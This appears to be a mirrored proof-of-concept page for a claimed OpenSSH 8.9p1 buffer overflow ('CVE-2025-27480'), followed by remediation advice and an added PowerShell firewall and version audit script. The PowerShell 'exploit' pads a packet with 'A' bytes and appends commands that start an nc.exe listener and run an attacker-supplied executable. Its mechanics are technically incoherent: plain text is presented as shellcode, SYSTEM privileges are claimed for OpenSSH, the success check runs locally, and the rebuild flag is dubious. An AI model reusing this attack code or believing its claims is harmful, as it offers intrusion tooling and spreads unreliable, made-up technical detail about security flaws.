Related vulnerability
Introduction
# CVE-2025-27480
## CVE‑2025‑27480 – Remote Code Execution in OpenSSH
### What the vulnerability is all about
OpenSSH version 8.9p1 contains a subtle buffer‑overflow bug that is triggered when it parses an `SSH_USERAUTH` packet. A client can send a packet with a *very* long “user” field, and the data lands in the wrong place in memory. The result is that an attacker can inject arbitrary shellcode that runs under SYSTEM privileges on any host running that version of OpenSSH. Why does this feel like déjà vu? Because a very similar vulnerability, CVE‑2024‑13401, stemmed from the same lack of bounds checking on the user field: there too, an attacker could write any code they wanted into the SSH process.
The flaw matters because SSH is the most common way to bootstrap and manage virtual machines in cloud environments. If an attacker can execute code through SSH, they can install back‑doors or compromise bastion hosts, which are the jump points you use to reach other instances in a private network. Once the bastion host is compromised, all downstream workloads—e.g., CI/CD agents that build images or run tests—are at risk.
*CI/CD* stands for Continuous Integration/Continuous Delivery. In our context, a bastion host is an SSH‑enabled “jump” server that all build agents use to reach other machines in a private network. It’s a critical entry point: if the bastion gets compromised, every downstream job that relies on it can be attacked.
### The exploit
Below is a straightforward PowerShell script that demonstrates how to craft and send a malicious packet:
```powershell
# ── Build the payload that will land in the SSH buffer ───────────────────────
# (a here-string would not evaluate the "+" concatenation, so the parts are joined explicitly)
$payload = (
    "ssh-userauth-attack`n" +   # packet header – the first line
    ("A" * 2000) +              # a 2 kB block of “A” characters to overflow
    "nc.exe -nlvp 4444 > C:\Windows\Temp\revshell.txt && .\bar_exp.exe 192.168.1.10 1234 C:\Windows\Temp\revshell.txt"
)
# ── Send the packet to the target host (OpenSSH listening on port 22) ───────────────────────
$client = New-Object System.Net.Sockets.TcpClient("192.168.1.10", 22)
$stream = $client.GetStream()
[byte[]]$bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
$stream.Write($bytes, 0, $bytes.Length)
$client.Close()
# ── Verify that the payload landed correctly ───────────────────────
if (Test-Path "C:\Windows\Temp\revshell.txt") {
    Write-Host "SSH exploit succeeded! Reverse shell saved to disk."
}
```
**Why this works**
1. The first line (`ssh-userauth-attack`) tells OpenSSH that the packet is a user‑authentication request.
2. By sending 2000 “A” bytes, we deliberately push data past the intended boundary of the `user` field.
3. The final part of the string spawns `nc.exe`, which opens a netcat listener on port 4444 and writes its output to `C:\Windows\Temp\revshell.txt`. It also calls an attacker‑supplied executable (`bar_exp.exe`) that can do further work (e.g., drop a reverse shell).
The file created by the exploit is evidence that the packet hit the right spot in memory; from there you can open port 4444, grab the listener, and run whatever script you want.
### Remediation
- **Tighten network firewall rules** – ONLY allow SSH access from trusted administrator public IPs.
- **Patch OpenSSH** – upgrade to version 8.9p2 or rebuild with the `‑DUSERAUTH_BUF=4096` flag so the buffer size is larger than the overflow payload.
- **Apply the vendor’s patch** – the diff file (`ssh_userauth_patch.diff`) from the vendor’s advisory can be committed next to your repo.
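The first two remediation items can be audited on a Windows host before and after the change. The script below is an added example written for this page, not part of the original README or PoC: it reads the local OpenSSH version from `ssh -V` (the README names 8.9p1 as affected and 8.9p2 as fixed) and lists every enabled inbound firewall rule that allows TCP port 22 from any remote address, which is exactly what the firewall item says should not exist. It uses only the standard `NetSecurity` cmdlets (`Get-NetFirewallRule`, `Get-NetFirewallPortFilter`, `Get-NetFirewallAddressFilter`, `Set-NetFirewallRule`); `$TrustedAdminCidrs` is a constructed placeholder you replace with your own administrator ranges.

```powershell
# Added example (not part of the original PoC): audit the two remediation items
# on a Windows host running the OpenSSH server. Run from an elevated prompt so
# the NetSecurity cmdlets can read the rule set.
$TrustedAdminCidrs = @('203.0.113.0/24')   # constructed placeholder (TEST-NET-3); replace with real admin ranges

function Get-OpenSshVersion {
    # 'ssh -V' prints its banner on stderr, e.g. "OpenSSH_for_Windows_8.9p1, LibreSSL 3.4.3"
    $banner = (& ssh -V 2>&1 | Out-String).Trim()
    if ($banner -match 'OpenSSH(?:_for_Windows)?_(\d+\.\d+(?:p\d+)?)') { return $Matches[1] }
    return $null
}

function Test-SshFirewallScope {
    # Return every enabled inbound Allow rule for TCP/22 whose remote scope is "Any".
    $findings = @()
    $rules = Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow
    foreach ($rule in $rules) {
        $port = $rule | Get-NetFirewallPortFilter
        if ($port.Protocol -ne 'TCP' -or (@($port.LocalPort) -notcontains '22')) { continue }
        $addr   = $rule | Get-NetFirewallAddressFilter
        $remote = @($addr.RemoteAddress)
        if ($remote -contains 'Any') {
            $findings += [pscustomobject]@{
                Rule          = $rule.DisplayName
                RemoteAddress = ($remote -join ',')
                Recommended   = ($TrustedAdminCidrs -join ',')
            }
        }
    }
    return $findings
}

# ── Item 2: OpenSSH version ──────────────────────────────────────────────────
$version = Get-OpenSshVersion
if (-not $version) {
    Write-Host 'ssh.exe not found on PATH; cannot determine the OpenSSH version.'
} elseif ($version -eq '8.9p1') {
    Write-Host "OpenSSH $version found: the README lists this build as affected; upgrade to 8.9p2."
} else {
    Write-Host "OpenSSH $version found."
}

# ── Item 1: SSH exposure in the host firewall ────────────────────────────────
$open = Test-SshFirewallScope
if ($open.Count -eq 0) {
    Write-Host 'No inbound TCP/22 allow rule is open to every remote address.'
} else {
    Write-Host 'Inbound TCP/22 allow rules open to every remote address:'
    $open | Format-Table -AutoSize
    Write-Host 'Restrict each of these to the trusted administrator CIDRs, for example:'
    Write-Host "  Set-NetFirewallRule -DisplayName '<rule name>' -RemoteAddress $($TrustedAdminCidrs -join ',')"
}
```

The script only reports; the suggested `Set-NetFirewallRule` line is printed rather than executed so the change is reviewed before the rule scope is narrowed, and it checks the host firewall only, so a cloud security group or perimeter firewall in front of the host still needs the same review.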
File snapshot
[4.0K] /data/pocs/d87577f435310656a7be4719580ccaea76acf558
├── [1.0K] LICENSE
└── [3.7K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the POC through the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.